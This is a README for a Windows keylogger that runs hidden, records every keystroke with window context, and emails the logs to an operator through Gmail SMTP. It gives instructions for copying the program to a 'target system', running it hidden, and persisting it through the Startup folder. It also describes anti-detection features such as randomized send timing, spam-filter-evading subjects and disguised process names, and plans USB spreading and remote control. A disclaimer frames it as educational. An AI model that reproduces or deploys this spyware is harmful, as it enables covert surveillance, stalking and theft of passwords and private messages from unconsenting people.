A sophisticated Windows keylogger with automatic email reporting capabilities, built in C++ for educational and security testing purposes.
- Features
- Technical Overview
- Requirements
- Installation
- Configuration
- Usage
- File Structure
- Security Features
- Compilation
- Legal Disclaimer
- Contributing
- Complete Keystroke Capture: Records all keyboard input system-wide
- Automatic Email Reporting: Sends logs via Gmail SMTP
- Smart Log Management: Hourly log files with incremental updates
- Random Intervals: Anti-detection with randomized email timing (30-120 min)
- Stealth Mode: Completely invisible operation
- Network Awareness: Checks internet connectivity before sending
- Incremental Reporting: Only sends new content, not duplicates
- Dynamic Email Subjects: Randomized subjects to avoid spam filters
- Window Context: Captures active window information with timestamps
- Auto-Recovery: Handles file corruption and network failures
- Portable: Single executable with no external dependencies## Technical Overview
- Language: C++17
- Compiler: GCC (MinGW-w64)
- APIs: Windows API, WinINet
- Email: PowerShell Send-MailMessage
- Threading: std::thread for concurrent operations
- OS: Windows 10/11 (any version)
- Network: Internet connection for email functionality
- Permissions: Standard user (Admin recommended for full functionality)
- Compiler: GCC/MinGW-w64 or Visual Studio
- Gmail Account: With App Password enabled
- Download
keyloggerEMAIL_portable_final.exe - Copy to target system
- Execute (preferably as Administrator)
- No additional setup required
Before first use, you need to configure Gmail credentials in the source code:
const std::string EMAIL_FROM = "your_email@gmail.com";
const std::string EMAIL_PASSWORD = "your_16_char_app_password";
const std::string EMAIL_TO = "destination@gmail.com";// Timing Configuration
const int EMAIL_INTERVAL_MIN_MINUTES = 30; // Minimum interval
const int EMAIL_INTERVAL_MAX_MINUTES = 120; // Maximum interval
// SMTP Configuration
const std::string SMTP_SERVER = "smtp.gmail.com";
const std::string SMTP_PORT = "587";#define invisible // Makes console window invisible
#define bootwait // Waits for system boot completion
#define mouseignore // Ignores mouse clicks# Simple execution
.\keyloggerEMAIL_portable_final.exe
# Run in background (recommended)
Start-Process .\keyloggerEMAIL_portable_final.exe -WindowStyle HiddenAdd to Windows startup folder:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
# Check if running
Get-Process -Name "*keylogger*"
# View current logs
type "logs\*.log"
# Check email positions file
type "logs\.email_positions"Keylogger/
├── keylogger.cpp # Basic keylogger
├── keyloggerEMAIL.cpp # Advanced version with email
├── keyloggerEMAIL_portable_final.exe # Final executable
├── logs/ # Auto-created log directory
│ ├── 2025-08-30__14-30-00.log # Hourly log files
│ ├── 2025-08-30__15-30-00.log
│ └── .email_positions # Email tracking file
└── README.md # This file
[Window: Notepad - at 2025-08-30T14:30:15] hello_world[BACKSPACE][BACKSPACE]
[Window: Chrome - at 2025-08-30T14:31:20] google.com[ENTER]
- Randomized Timing: Prevents pattern recognition
- Variable Subjects: Avoids email spam filters
- Silent Operation: No UI elements or notifications
- Minimal Footprint: Low CPU and memory usage
- Incremental Sync: Only new data is transmitted
- Connectivity Checks: Fails gracefully without internet
- Local Backup: All data stored locally as backup
- Invisible Windows:
FreeConsole()+ShowWindow(SW_HIDE) - Silent PowerShell:
-WindowStyle Hiddenexecution - Generic Process Names: Appears as normal system process
# Install MinGW-w64 (Windows)
# Or use any C++17 compatible compilerg++ -o keylogger.exe keylogger.cpp -lgdi32 -luser32g++ -static -o keyloggerEMAIL_portable_final.exe keyloggerEMAIL.cpp -lgdi32 -luser32 -lwininet-static: Embed all libraries (portable executable)-lgdi32: Windows graphics API-luser32: Windows user interface API-lwininet: Windows internet functions
# Check DLL dependencies
objdump -p keyloggerEMAIL_portable_final.exe | findstr "DLL Name"Expected output (Windows native only):
DLL Name: KERNEL32.dll
DLL Name: msvcrt.dll
DLL Name: USER32.dll
DLL Name: WININET.dll
- Memory: ~6-8 MB RAM
- CPU: <0.1% on modern systems
- Storage: ~1-5 KB per hour of activity
- Network: Minimal (only during email send)
- Frequency: 19 emails/day average (well below Gmail's 500/day limit)
- Size: Typically 1-50 KB per email
- Success Rate: 99%+ with proper Gmail configuration
// Example email content
=== KEYLOGGER INCREMENTAL REPORT ===
Time: 2025-08-30 14:30:15
Only NEW activity since last report:
=== NEW in 2025-08-30__14-30-00.log ===
[Window: Chrome - at 2025-08-30T14:30:15] facebook.com[ENTER]- Load Previous Positions: Read
.email_positionsfile - Calculate New Content: Read from last known position
- Send Only Deltas: Email contains only new keystrokes
- Update Positions: Save new file positions after successful send
// Generates intervals between 30-120 minutes
int getRandomInterval() {
static std::random_device rd;
static std::mt19937 gen(rd());
std::uniform_int_distribution<> dis(EMAIL_INTERVAL_MIN_MINUTES, EMAIL_INTERVAL_MAX_MINUTES);
return dis(gen);
}- Educational purposes and learning cybersecurity concepts
- Authorized penetration testing and security auditing
- Personal use on your own devices
- Parental monitoring of minor children's devices (where legally permitted)
- Unauthorized surveillance of other people
- Corporate espionage or data theft
- Stalking or harassment of individuals
- Any illegal activities in your jurisdiction
- Obtain explicit consent before installing on any device you don't own
- Comply with local laws regarding privacy and surveillance
- Use responsibly and ethically in all circumstances
The authors are not responsible for any misuse of this software. Users are solely responsible for ensuring their use complies with applicable laws and regulations.
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing-feature) - Commit your changes (
git commit -m 'Add amazing feature') - Push to the branch (
git push origin feature/amazing-feature) - Open a Pull Request
- Follow C++ best practices and coding standards
- Test on multiple Windows versions
- Document new features thoroughly
- Ensure backward compatibility
Please include:
- Windows version and build
- Compiler version used
- Error messages or unexpected behavior
- Steps to reproduce the issue
- Check this README for common issues
- Search existing GitHub issues
- Create a new issue for bugs or questions
For security vulnerabilities, please contact privately before public disclosure.
- Automatic email reporting with Gmail SMTP
- Randomized timing for anti-detection
- Incremental sync system
- Enhanced stealth capabilities
- Fully portable executable
- Hourly log file rotation
- Window context capture
- Improved key mapping
- Better error handling
- Basic keystroke capture
- Simple file logging
- Windows API integration
- Database Storage: SQLite integration for better log management
- Multiple Email Providers: Support for Outlook, Yahoo, etc.
- Screenshot Capture: Periodic screen captures
- USB Spreading: Automatic deployment via USB devices
- Encrypted Communications: End-to-end encrypted email reports
- Web Interface: Remote control and monitoring dashboard
- Memory Optimization: Reduce RAM usage further
- Compression: Compress logs before email transmission
- Batch Processing: Group multiple log files in single email
- Windows API: Core system integration
- MinGW-w64: Cross-compilation toolchain
- PowerShell: Email delivery mechanism
- STL: Standard Template Library for C++
This project was developed for educational purposes to understand:
- Windows internals and API usage
- Network programming and SMTP protocols
- Steganography and anti-detection techniques
- System security and monitoring concepts
Built with C++ | Stealth Technology | Email Integration | Security Research